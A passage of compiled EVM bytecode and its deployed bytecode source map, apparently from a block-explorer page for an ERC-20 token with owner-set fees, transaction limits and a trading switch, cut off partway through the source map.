e9f565b92915050565b613ed281613d76565b82525050565b6000602082019050613eed6000830184613ec9565b92915050565b600060208284031215613f0957613f08613d13565b5b6000613f1784828501613d97565b91505092915050565b600080600060608486031215613f3957613f38613d13565b5b6000613f4786828701613d61565b9350506020613f5886828701613d61565b9250506040613f6986828701613d97565b9150509250925092565b600060ff82169050919050565b613f8981613f73565b82525050565b6000602082019050613fa46000830184613f80565b92915050565b613fb381613d38565b82525050565b6000602082019050613fce6000830184613faa565b92915050565b613fdd81613dec565b8114613fe857600080fd5b50565b600081359050613ffa81613fd4565b92915050565b6000806040838503121561401757614016613d13565b5b600061402585828601613d61565b925050602061403685828601613feb565b9150509250929050565b60008060006060848603121561405957614058613d13565b5b600061406786828701613d97565b935050602061407886828701613d97565b925050604061408986828701613d97565b9150509250925092565b600080604083850312156140aa576140a9613d13565b5b60006140b885828601613d97565b92505060206140c985828601613d97565b9150509250929050565b600080604083850312156140ea576140e9613d13565b5b60006140f885828601613d61565b925050602061410985828601613d61565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061415a57607f821691505b60208210810361416d5761416c614113565b5b50919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006141a9602083613c6c565b91506141b482614173565b602082019050919050565b600060208201905081810360008301526141d88161419c565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061424882613d76565b915061425383613d76565b925082614263576142626141df565b5b828204905092915050565b7f43616e6e6f7420736574206d61785472616e73616374696f6e416d6f756e742060008201527f6c6f776572207468616e20302e31250000000000000000000000000000000000602082015250565b60006142ca602f83613c6c565b91506142d58261426e565b604082019050919050565b600060208201905081810360008301526142f9816142bd565b9050919050565b600061430b82613d76565b915061431683613d76565b925082820190508082111561432e5761432d61420e565b5b92915050565b7f4d757374206b656570206665657320617420323025206f72206c657373000000600082015250565b600061436a601d83613c6c565b915061437582614334565b602082019050919050565b600060208201905081810360008301526143998161435d565b9050919050565b7f646f6e6500000000000000000000000000000000000000000000000000000000600082015250565b60006143d6600483613c6c565b91506143e1826143a0565b602082019050919050565b60006020820190508181036000830152614405816143c9565b9050919050565b7f54686520706169722063616e6e6f742062652072656d6f7665642066726f6d2060008201527f6175746f6d617465644d61726b65744d616b6572506169727300000000000000602082015250565b6000614468603983613c6c565b91506144738261440c565b604082019050919050565b600060208201905081810360008301526144978161445b565b9050919050565b7f616d6f756e742065786365656465640000000000000000000000000000000000600082015250565b60006144d4600f83613c6c565b91506144df8261449e565b602082019050919050565b60006020820190508181036000830152614503816144c7565b9050919050565b600081905092915050565b50565b600061452560008361450a565b915061453082614515565b600082019050919050565b600061454682614518565b9150819050919050565b7f4d757374206b656570206665657320617420323525206f72206c657373000000600082015250565b6000614586601d83613c6c565b915061459182614550565b602082019050919050565b600060208201905081810360008301526145b581614579565b9050919050565b60006145c782613d76565b91506145d283613d76565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff048311821515161561460b5761460a61420e565b5b828202905092915050565b7f43616e6e6f7420736574206d617857616c6c6574206c6f776572207468616e2060008201527f302e352500000000000000000000000000000000000000000000000000000000602082015250565b6000614672602483613c6c565b915061467d82614616565b604082019050919050565b600060208201905081810360008301526146a181614665565b9050919050565b7f5377617020616d6f756e742063616e6e6f74206265206c6f776572207468616e60008201527f20302e3030312520746f74616c20737570706c792e0000000000000000000000602082015250565b6000614704603583613c6c565b915061470f826146a8565b604082019050919050565b60006020820190508181036000830152614733816146f7565b9050919050565b7f5377617020616d6f756e742063616e6e6f74206265206869676865722074686160008201527f6e20302e352520746f74616c20737570706c792e000000000000000000000000602082015250565b6000614796603483613c6c565b91506147a18261473a565b604082019050919050565b600060208201905081810360008301526147c581614789565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000614828602683613c6c565b9150614833826147cc565b604082019050919050565b600060208201905081810360008301526148578161481b565b9050919050565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b6000614894601b83613c6c565b915061489f8261485e565b602082019050919050565b600060208201905081810360008301526148c381614887565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000614926602483613c6c565b9150614931826148ca565b604082019050919050565b6000602082019050818103600083015261495581614919565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006149b8602283613c6c565b91506149c38261495c565b604082019050919050565b600060208201905081810360008301526149e7816149ab565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000614a4a602583613c6c565b9150614a55826149ee565b604082019050919050565b60006020820190508181036000830152614a7981614a3d565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000614adc602383613c6c565b9150614ae782614a80565b604082019050919050565b60006020820190508181036000830152614b0b81614acf565b9050919050565b7f54726164696e67206973206e6f74206163746976652e00000000000000000000600082015250565b6000614b48601683613c6c565b9150614b5382614b12565b602082019050919050565b60006020820190508181036000830152614b7781614b3b565b9050919050565b7f427579207472616e7366657220616d6f756e742065786365656473207468652060008201527f6d61785472616e73616374696f6e416d6f756e742e0000000000000000000000602082015250565b6000614bda603583613c6c565b9150614be582614b7e565b604082019050919050565b60006020820190508181036000830152614c0981614bcd565b9050919050565b7f53656c6c207472616e7366657220616d6f756e7420657863656564732074686560008201527f206d61785472616e73616374696f6e416d6f756e742e00000000000000000000602082015250565b6000614c6c603683613c6c565b9150614c7782614c10565b604082019050919050565b60006020820190508181036000830152614c9b81614c5f565b9050919050565b6000614cad82613d76565b9150614cb883613d76565b925082614cc857614cc76141df565b5b828206905092915050565b7f4552524f523a204d757374206265206c657373207468616e206d61785478416d60008201527f6f756e7400000000000000000000000000000000000000000000000000000000602082015250565b6000614d2f602483613c6c565b9150614d3a82614cd3565b604082019050919050565b60006020820190508181036000830152614d5e81614d22565b9050919050565b6000614d7082613d76565b9150614d7b83613d76565b9250828203905081811115614d9357614d9261420e565b5b92915050565b60008160011c9050919050565b6000808291508390505b6001851115614df057808604811115614dcc57614dcb61420e565b5b6001851615614ddb5780820291505b8081029050614de985614d99565b9450614db0565b94509492505050565b600082614e095760019050614ec5565b81614e175760009050614ec5565b8160018114614e2d5760028114614e3757614e66565b6001915050614ec5565b60ff841115614e4957614e4861420e565b5b8360020a915084821115614e6057614e5f61420e565b5b50614ec5565b5060208310610133831016604e8410600b8410161715614e9b5782820a905083811115614e9657614e9561420e565b5b614ec5565b614ea88484846001614da6565b92509050818404811115614ebf57614ebe61420e565b5b81810290505b9392505050565b6000614ed782613d76565b9150614ee283613f73565b9250614f0f7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484614df9565b905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b600081519050614f8481613d4a565b92915050565b600060208284031215614fa057614f9f613d13565b5b6000614fae84828501614f75565b91505092915050565b6000819050919050565b6000614fdc614fd7614fd284614fb7565b613e4f565b613d76565b9050919050565b614fec81614fc1565b82525050565b600081519050919050565b600082825260208201905092915050565b6000819050602082019050919050565b61502781613d38565b82525050565b6000615039838361501e565b60208301905092915050565b6000602082019050919050565b600061505d82614ff2565b6150678185614ffd565b93506150728361500e565b8060005b838110156150a357815161508a888261502d565b975061509583615045565b925050600181019050615076565b5085935050505092915050565b600060a0820190506150c56000830188613ec9565b6150d26020830187614fe3565b81810360408301526150e48186615052565b90506150f36060830185613faa565b6151006080830184613ec9565b9695505050505050565b7f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f60008201527f7700000000000000000000000000000000000000000000000000000000000000602082015250565b6000615166602183613c6c565b91506151718261510a565b604082019050919050565b6000602082019050818103600083015261519581615159565b905091905056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220ea0b633bd227dd5e776998271450716102d83491e821b82eb617781f523cd44b64736f6c63430008100033

Deployed Bytecode Sourcemap

30504:13908:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8666:100;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10833:169;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;31860:64;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;30579:41;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9786:108;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;38651:157;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;31639:33;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;31599;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;35951:255;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;11484:355;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9628:93;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12248:218;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;30627:28;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;30916:33;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;38822:125;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;31450:28;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;30996:31;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9957:127;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;23131:148;;;;;;;;;;;;;:::i;:::-;;35162:121;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;36441:144;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;30723:30;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;31339;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;36597:369;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;44178:229;;;;;;;;;;;;;:::i;:::-;;22489:79;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;30760:24;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;31485:31;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8885:104;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;37983:244;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;31413:24;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;31679:27;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;37554:421;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;31561:25;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12969:269;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10297:175;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;38431:208;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;32082:58;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;30956:33;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;37364:182;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;36978:378;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;36214:215;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;31218:40;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;30797:35;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;35558:381;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;31305:27;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10535:151;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;30839:33;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;35348:135;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;31376:30;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;23434:244;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;31523:31;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;30879:24;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8666:100;8720:13;8753:5;8746:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8666:100;:::o;10833:169::-;10916:4;10933:39;10942:12;:10;:12::i;:::-;10956:7;10965:6;10933:8;:39::i;:::-;10990:4;10983:11;;10833:169;;;;:::o;31860:64::-;;;;;;;;;;;;;;;;;;;;;;:::o;30579:41::-;;;;;;;;;;;;;:::o;9786:108::-;9847:7;9874:12;;9867:19;;9786:108;:::o;38651:157::-;22711:12;:10;:12::i;:::-;22701:22;;:6;;;;;;;;;;;:22;;;22693:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;38758:9:::1;;;;;;;;;;;38730:38;;38747:9;38730:38;;;;;;;;;;;;38791:9;38779;;:21;;;;;;;;;;;;;;;;;;38651:157:::0;:::o;31639:33::-;;;;:::o;31599:::-;;;;:::o;35951:255::-;36037:15;;;;;;;;;;;36023:29;;:10;:29;;;36015:38;;;;;;36102:4;36086:13;:11;:13::i;:::-;:20;;;;:::i;:::-;36076:6;:30;;36068:90;;;;;;;;;;;;:::i;:::-;;;;;;;;;36192:6;36169:20;:29;;;;35951:255;:::o;11484:355::-;11624:4;11641:36;11651:6;11659:9;11670:6;11641:9;:36::i;:::-;11688:121;11697:6;11705:12;:10;:12::i;:::-;11719:89;11757:6;11719:89;;;;;;;;;;;;;;;;;:11;:19;11731:6;11719:19;;;;;;;;;;;;;;;:33;11739:12;:10;:12::i;:::-;11719:33;;;;;;;;;;;;;;;;:37;;:89;;;;;:::i;:::-;11688:8;:121::i;:::-;11827:4;11820:11;;11484:355;;;;;:::o;9628:93::-;9686:5;9711:2;9704:9;;9628:93;:::o;12248:218::-;12336:4;12353:83;12362:12;:10;:12::i;:::-;12376:7;12385:50;12424:10;12385:11;:25;12397:12;:10;:12::i;:::-;12385:25;;;;;;;;;;;;;;;:34;12411:7;12385:34;;;;;;;;;;;;;;;;:38;;:50;;;;:::i;:::-;12353:8;:83::i;:::-;12454:4;12447:11;;12248:218;;;;:::o;30627:28::-;;;;;;;;;;;;;:::o;30916:33::-;;;;;;;;;;;;;:::o;38822:125::-;38887:4;38911:19;:28;38931:7;38911:28;;;;;;;;;;;;;;;;;;;;;;;;;38904:35;;38822:125;;;:::o;31450:28::-;;;;:::o;30996:31::-;;;;;;;;;;;;;:::o;9957:127::-;10031:7;10058:9;:18;10068:7;10058:18;;;;;;;;;;;;;;;;10051:25;;9957:127;;;:::o;23131:148::-;22711:12;:10;:12::i;:::-;22701:22;;:6;;;;;;;;;;;:22;;;22693:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;23238:1:::1;23201:40;;23222:6;;;;;;;;;;;23201:40;;;;;;;;;;;;23269:1;23252:6;;:19;;;;;;;;;;;;;;;;;;23131:148::o:0;35162:121::-;35214:4;22711:12;:10;:12::i;:::-;22701:22;;:6;;;;;;;;;;;:22;;;22693:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;35248:5:::1;35231:14;;:22;;;;;;;;;;;;;;;;;;35271:4;35264:11;;35162:121:::0;:::o;36441:144::-;22711:12;:10;:12::i;:::-;22701:22;;:6;;;;;;;;;;;:22;;;22693:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;36573:4:::1;36531:31;:39;36563:6;36531:39;;;;;;;;;;;;;;;;:46;;;;;;;;;;;;;;;;;;36441:144:::0;;:::o;30723:30::-;;;;;;;;;;;;;:::o;31339:::-;;;;:::o;36597:369::-;22711:12;:10;:12::i;:::-;22701:22;;:6;;;;;;;;;;;:22;;;22693:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;36731:13:::1;36713:15;:31;;;;36773:13;36755:15;:31;;;;36809:7;36797:9;:19;;;;36878:9;;36860:15;;36842;;:33;;;;:::i;:::-;:45;;;;:::i;:::-;36827:12;:60;;;;36922:2;36906:12;;:18;;36898:60;;;;;;;;;;;;:::i;:::-;;;;;;;;;36597:369:::0;;;:::o;44178:229::-;22711:12;:10;:12::i;:::-;22701:22;;:6;;;;;;;;;;;:22;;;22693:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;44249:4:::1;44235:11;;:18;;;;;;;;;;;;;;;;;;44287:4;44272:19;;:11;;;;;;;;;;;:19;;;44264:36;;;;;;;;;;;;:::i;:::-;;;;;;;;;44325:5;44311:11;;:19;;;;;;;;;;;;;;;;;;44341:13;:11;:13::i;:::-;44370:29;44387:11;;;;;;;;;;;44370:29;;;;;;:::i;:::-;;;;;;;;44178:229::o:0;22489:79::-;22527:7;22554:6;;;;;;;;;;;22547:13;;22489:79;:::o;30760:24::-;;;;;;;;;;;;;:::o;31485:31::-;;;;:::o;8885:104::-;8941:13;8974:7;8967:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8885:104;:::o;37983:244::-;22711:12;:10;:12::i;:::-;22701:22;;:6;;;;;;;;;;;:22;;;22693:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;38090:13:::1;;;;;;;;;;;38082:21;;:4;:21;;::::0;38074:91:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;38178:41;38207:4;38213:5;38178:28;:41::i;:::-;37983:244:::0;;:::o;31413:24::-;;;;:::o;31679:27::-;;;;:::o;37554:421::-;37614:4;37639:19;:31;37659:10;37639:31;;;;;;;;;;;;;;;;;;;;;;;;;37631:40;;;;;;37684:7;37694:24;37704:13;;;;;;;;;;;37694:9;:24::i;:::-;37684:34;;37744:1;37739:2;:6;:23;;;;;37759:3;37754:2;:8;;;;:::i;:::-;37749:2;:13;37739:23;37731:51;;;;;;;;;;;;:::i;:::-;;;;;;;;;37795:22;37814:2;37795:18;:22::i;:::-;37828:20;37845:2;37828:16;:20::i;:::-;37862:12;37887:15;;;;;;;;;;;37879:29;;37916:21;37879:63;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;37861:81;;;37960:7;37953:14;;;;37554:421;;;;:::o;31561:25::-;;;;:::o;12969:269::-;13062:4;13079:129;13088:12;:10;:12::i;:::-;13102:7;13111:96;13150:15;13111:96;;;;;;;;;;;;;;;;;:11;:25;13123:12;:10;:12::i;:::-;13111:25;;;;;;;;;;;;;;;:34;13137:7;13111:34;;;;;;;;;;;;;;;;:38;;:96;;;;;:::i;:::-;13079:8;:129::i;:::-;13226:4;13219:11;;12969:269;;;;:::o;10297:175::-;10383:4;10400:42;10410:12;:10;:12::i;:::-;10424:9;10435:6;10400:9;:42::i;:::-;10460:4;10453:11;;10297:175;;;;:::o;38431:208::-;22711:12;:10;:12::i;:::-;22701:22;;:6;;;;;;;;;;;:22;;;22693:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;38568:15:::1;;;;;;;;;;;38525:59;;38548:18;38525:59;;;;;;;;;;;;38613:18;38595:15;;:36;;;;;;;;;;;;;;;;;;38431:208:::0;:::o;32082:58::-;;;;;;;;;;;;;;;;;;;;;;:::o;30956:33::-;;;;;;;;;;;;;:::o;37364:182::-;22711:12;:10;:12::i;:::-;22701:22;;:6;;;;;;;;;;;:22;;;22693:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;37480:8:::1;37449:19;:28;37469:7;37449:28;;;;;;;;;;;;;;;;:39;;;;;;;;;;;;;;;;;;37520:7;37504:34;;;37529:8;37504:34;;;;;;:::i;:::-;;;;;;;;37364:182:::0;;:::o;36978:378::-;22711:12;:10;:12::i;:::-;22701:22;;:6;;;;;;;;;;;:22;;;22693:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;37114:13:::1;37095:16;:32;;;;37157:13;37138:16;:32;;;;37194:7;37181:10;:20;;;;37266:10;;37247:16;;37228;;:35;;;;:::i;:::-;:48;;;;:::i;:::-;37212:13;:64;;;;37312:2;37295:13;;:19;;37287:61;;;;;;;;;;;;:::i;:::-;;;;;;;;;36978:378:::0;;;:::o;36214:215::-;22711:12;:10;:12::i;:::-;22701:22;;:6;;;;;;;;;;;:22;;;22693:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;36336:4:::1;36330;36326:1;36310:13;:11;:13::i;:::-;:17;;;;:::i;:::-;:24;;;;:::i;:::-;36309:31;;;;:::i;:::-;36299:6;:41;;36291:90;;;;;;;;;;;;:::i;:::-;;;;;;;;;36414:6;36404;:17;;;;:::i;:::-;36392:9;:29;;;;36214:215:::0;:::o;31218:40::-;;;;;;;;;;;;;:::o;30797:35::-;;;;:::o;35558:381::-;35639:4;22711:12;:10;:12::i;:::-;22701:22;;:6;;;;;;;;;;;:22;;;22693:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;35695:6:::1;35691:1;35675:13;:11;:13::i;:::-;:17;;;;:::i;:::-;:26;;;;:::i;:::-;35662:9;:39;;35654:105;;;;;;;;;;;;:::i;:::-;;;;;;;;;35810:4;35806:1;35790:13;:11;:13::i;:::-;:17;;;;:::i;:::-;:24;;;;:::i;:::-;35777:9;:37;;35769:102;;;;;;;;;;;;:::i;:::-;;;;;;;;;35902:9;35881:18;:30;;;;35928:4;35921:11;;35558:381:::0;;;:::o;31305:27::-;;;;:::o;10535:151::-;10624:7;10651:11;:18;10663:5;10651:18;;;;;;;;;;;;;;;:27;10670:7;10651:27;;;;;;;;;;;;;;;;10644:34;;10535:151;;;;:::o;30839:33::-;;;;:::o;35348:135::-;35408:4;22711:12;:10;:12::i;:::-;22701:22;;:6;;;;;;;;;;;:22;;;22693:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;35448:5:::1;35425:20;;:28;;;;;;;;;;;;;;;;;;35471:4;35464:11;;35348:135:::0;:::o;31376:30::-;;;;:::o;23434:244::-;22711:12;:10;:12::i;:::-;22701:22;;:6;;;;;;;;;;;:22;;;22693:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;23543:1:::1;23523:22;;:8;:22;;::::0;23515:73:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;23633:8;23604:38;;23625:6;;;;;;;;;;;23604:38;;;;;;;;;;;;23662:8;23653:6;;:17;;;;;;;;;;;;;;;;;;23434:244:::0;:::o;31523:31::-;;;;:::o;30879:24::-;;;;:::o;17533:181::-;17591:7;17611:9;17627:1;17623;:5;;;;:::i;:::-;17611:17;;17652:1;17647;:6;;17639:46;;;;;;;;;;;;:::i;:::-;;;;;;;;;17705:1;17698:8;;;17533:181;;;;:::o;1304:98::-;1357:7;1384:10;1377:17;;1304:98;:::o;16155:380::-;16308:1;16291:19;;:5;:19;;;16283:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;16389:1;16370:21;;:7;:21;;;16362:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;16473:6;16443:11;:18;16455:5;16443:18;;;;;;;;;;;;;;;:27;16462:7;16443:27;;;;;;;;;;;;;;;:36;;;;16511:7;16495:32;;16504:5;16495:32;;;16520:6;16495:32;;;;;;:::i;:::-;;;;;;;;16155:380;;;:::o;39153:3362::-;39301:1;39285:18;;:4;:18;;;39277:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;39378:1;39364:16;;:2;:16;;;39356:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;39447:1;39437:6;:11;39434:92;;39465:28;39481:4;39487:2;39491:1;39465:15;:28::i;:::-;39508:7;;39434:92;39549:14;;;;;;;;;;;39546:997;;;39609:7;:5;:7::i;:::-;39601:15;;:4;:15;;;;:49;;;;;39643:7;:5;:7::i;:::-;39637:13;;:2;:13;;;;39601:49;:86;;;;;39685:1;39671:16;;:2;:16;;;;39601:86;:128;;;;;39722:6;39708:21;;:2;:21;;;;39601:128;:158;;;;;39751:8;;;;;;;;;;;39750:9;39601:158;39579:953;;;39797:13;;;;;;;;;;;39793:148;;39842:19;:25;39862:4;39842:25;;;;;;;;;;;;;;;;;;;;;;;;;:52;;;;39871:19;:23;39891:2;39871:23;;;;;;;;;;;;;;;;;;;;;;;;;39842:52;39834:87;;;;;;;;;;;;:::i;:::-;;;;;;;;;39793:148;40010:25;:31;40036:4;40010:31;;;;;;;;;;;;;;;;;;;;;;;;;:71;;;;;40046:31;:35;40078:2;40046:35;;;;;;;;;;;;;;;;;;;;;;;;;40045:36;40010:71;40006:511;;;40128:20;;40118:6;:30;;40110:96;;;;;;;;;;;;:::i;:::-;;;;;;;;;40006:511;;;40300:25;:29;40326:2;40300:29;;;;;;;;;;;;;;;;;;;;;;;;;:71;;;;;40334:31;:37;40366:4;40334:37;;;;;;;;;;;;;;;;;;;;;;;;;40333:38;40300:71;40296:221;;;40418:20;;40408:6;:30;;40400:97;;;;;;;;;;;;:::i;:::-;;;;;;;;;40296:221;40006:511;39579:953;39546:997;40557:28;40588:24;40606:4;40588:9;:24::i;:::-;40557:55;;40633:12;40672:18;;40648:20;:42;;40633:57;;40721:7;:35;;;;;40745:11;;;;;;;;;;;40721:35;:61;;;;;40774:8;;;;;;;;;;;40773:9;40721:61;:110;;;;;40800:25;:31;40826:4;40800:31;;;;;;;;;;;;;;;;;;;;;;;;;40799:32;40721:110;:153;;;;;40849:19;:25;40869:4;40849:25;;;;;;;;;;;;;;;;;;;;;;;;;40848:26;40721:153;:194;;;;;40892:19;:23;40912:2;40892:23;;;;;;;;;;;;;;;;;;;;;;;;;40891:24;40721:194;40703:338;;;40953:4;40942:8;;:15;;;;;;;;;;;;;;;;;;40986:10;:8;:10::i;:::-;41024:5;41013:8;;:16;;;;;;;;;;;;;;;;;;40703:338;41053:12;41069:8;;;;;;;;;;;41068:9;41053:24;;41178:19;:25;41198:4;41178:25;;;;;;;;;;;;;;;;;;;;;;;;;:52;;;;41207:19;:23;41227:2;41207:23;;;;;;;;;;;;;;;;;;;;;;;;;41178:52;41175:99;;;41257:5;41247:15;;41175:99;41294:12;41398:7;41395:1067;;;41449:25;:29;41475:2;41449:29;;;;;;;;;;;;;;;;;;;;;;;;;:50;;;;;41498:1;41482:13;;:17;41449:50;41445:848;;;41526:34;41556:3;41526:25;41537:13;;41526:6;:10;;:25;;;;:::i;:::-;:29;;:34;;;;:::i;:::-;41519:41;;41627:13;;41608:16;;41601:4;:23;;;;:::i;:::-;:39;;;;:::i;:::-;41579:18;;:61;;;;;;;:::i;:::-;;;;;;;;41695:13;;41682:10;;41675:4;:17;;;;:::i;:::-;:33;;;;:::i;:::-;41659:12;;:49;;;;;;;:::i;:::-;;;;;;;;41775:13;;41756:16;;41749:4;:23;;;;:::i;:::-;:39;;;;:::i;:::-;41727:18;;:61;;;;;;;:::i;:::-;;;;;;;;41839:1;41834;41811:20;;:24;;;;:::i;:::-;:29;41807:81;;41842:46;;;;;;;;;;:::i;:::-;;;;;;;;41807:81;41445:848;;;41949:25;:31;41975:4;41949:31;;;;;;;;;;;;;;;;;;;;;;;;;:51;;;;;41999:1;41984:12;;:16;41949:51;41946:347;;;42025:33;42054:3;42025:24;42036:12;;42025:6;:10;;:24;;;;:::i;:::-;:28;;:33;;;;:::i;:::-;42018:40;;42121:12;;42103:15;;42096:4;:22;;;;:::i;:::-;:37;;;;:::i;:::-;4